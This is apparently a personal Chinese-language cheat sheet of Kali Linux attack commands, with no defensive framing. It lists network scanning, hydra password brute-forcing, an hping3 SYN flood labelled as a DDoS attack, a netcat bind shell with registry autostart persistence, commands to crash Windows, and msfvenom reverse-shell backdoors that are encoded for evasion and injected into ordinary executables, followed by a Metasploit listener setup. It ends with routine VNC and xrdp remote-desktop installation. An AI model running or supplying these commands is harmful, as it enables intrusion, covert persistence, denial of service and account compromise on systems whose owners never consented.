kali字典文件:wordlists
扫描存活主机:nmap -sP 192.168.10.0/24
扫描存活主机详情:nmap -sS 192.168.10.0/24
扫描主机端口号:nmap -sS -p 端口列表 主机列表
扫描端口对应信息:nmap -sV -p 端口 主机
密码破解:hydra -l 用户名 -P 密码字典文件 目标地址 服务类型(tcp/udp/rdp)
密码生成工具:crunch 最短位数 最长位数 -t pwd%%%% (以pwd开头后面为数字) -o 保存文件名
DDoS攻击:hping3 –syn –rand-source –flood -p 3389 IP地址
瑞士军刀文件:/usr/share/windows-resources/binaries/nc.exe
瑞士军刀客户机运行:nc.exe -Ldp [自定义端口号] -e cmd.exe
瑞士军刀客户机开机自启动:reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d [nc程序路径] -Ldp [自定义端口号] -e cmd.exe
瑞士军刀控制端运行:nc [目标主机IP] [被控端的自定义端口号]
cmd改中文:chcp 65001
Windows蓝屏命令:[taskkill /im wininit.exe /f][taskkill /fi “pid ne 1” /f]
生成后门
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.25.130 LPOST=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /demo111/hei.exe
使用双编码器生成后门
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.25.130 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 –platform windows -e x86/alpha_upper -i 10 -f exe -o /demo11/hei.exe
给程序植入后门
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.25.130 LPOST=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -x 文件名.exe -f exe -o /demo111/hei.exe
开启监听
msfdb run
use exploit/multi/handler
show options
修改为上方后门使用的payload
set payload windows/meterpreter/reverse_tcp
设置lhost为本机
set lhost 192.168.25.130
msfconsole工具
msfconsole 使用工具
search [名称] 搜索漏洞
use [编号] 使用漏洞
set rhost [IP地址] 设置目标地址
run 开始攻击
back 返回
exit 退出msfconsole工具
安装vnc服务
sudo apt update
sudo apt install tightvncserver xfce4 xfce4-goodies -y
初始化vncserver :1
关闭会话vncserver -kill :1
编辑文件nano ~/.vnc/xstartup
替换为
#!/bin/bash
xrdb $HOME/.Xresources
startxfce4 &
赋予权限chmod +x ~/.vnc/xstartup
重启服务vncserver :1 -geometry 1280×720 -depth 24
安装xrdp
安装 xrdp 和 XFCE 桌面环境 sudo apt install kali-desktop-xfce xrdp -y
将 XFCE 会话写入配置 echo “xfce4-session” > ~/.xsession
修改 xrdp 启动脚本(解决黑屏或闪退问题)sudo nano /etc/xrdp/startwm.sh
xfce4-session
test -x /etc/X11/Xsession && exec /etc/X11/Xsession
sudo systemctl enable xrdp
sudo systemctl start xrdp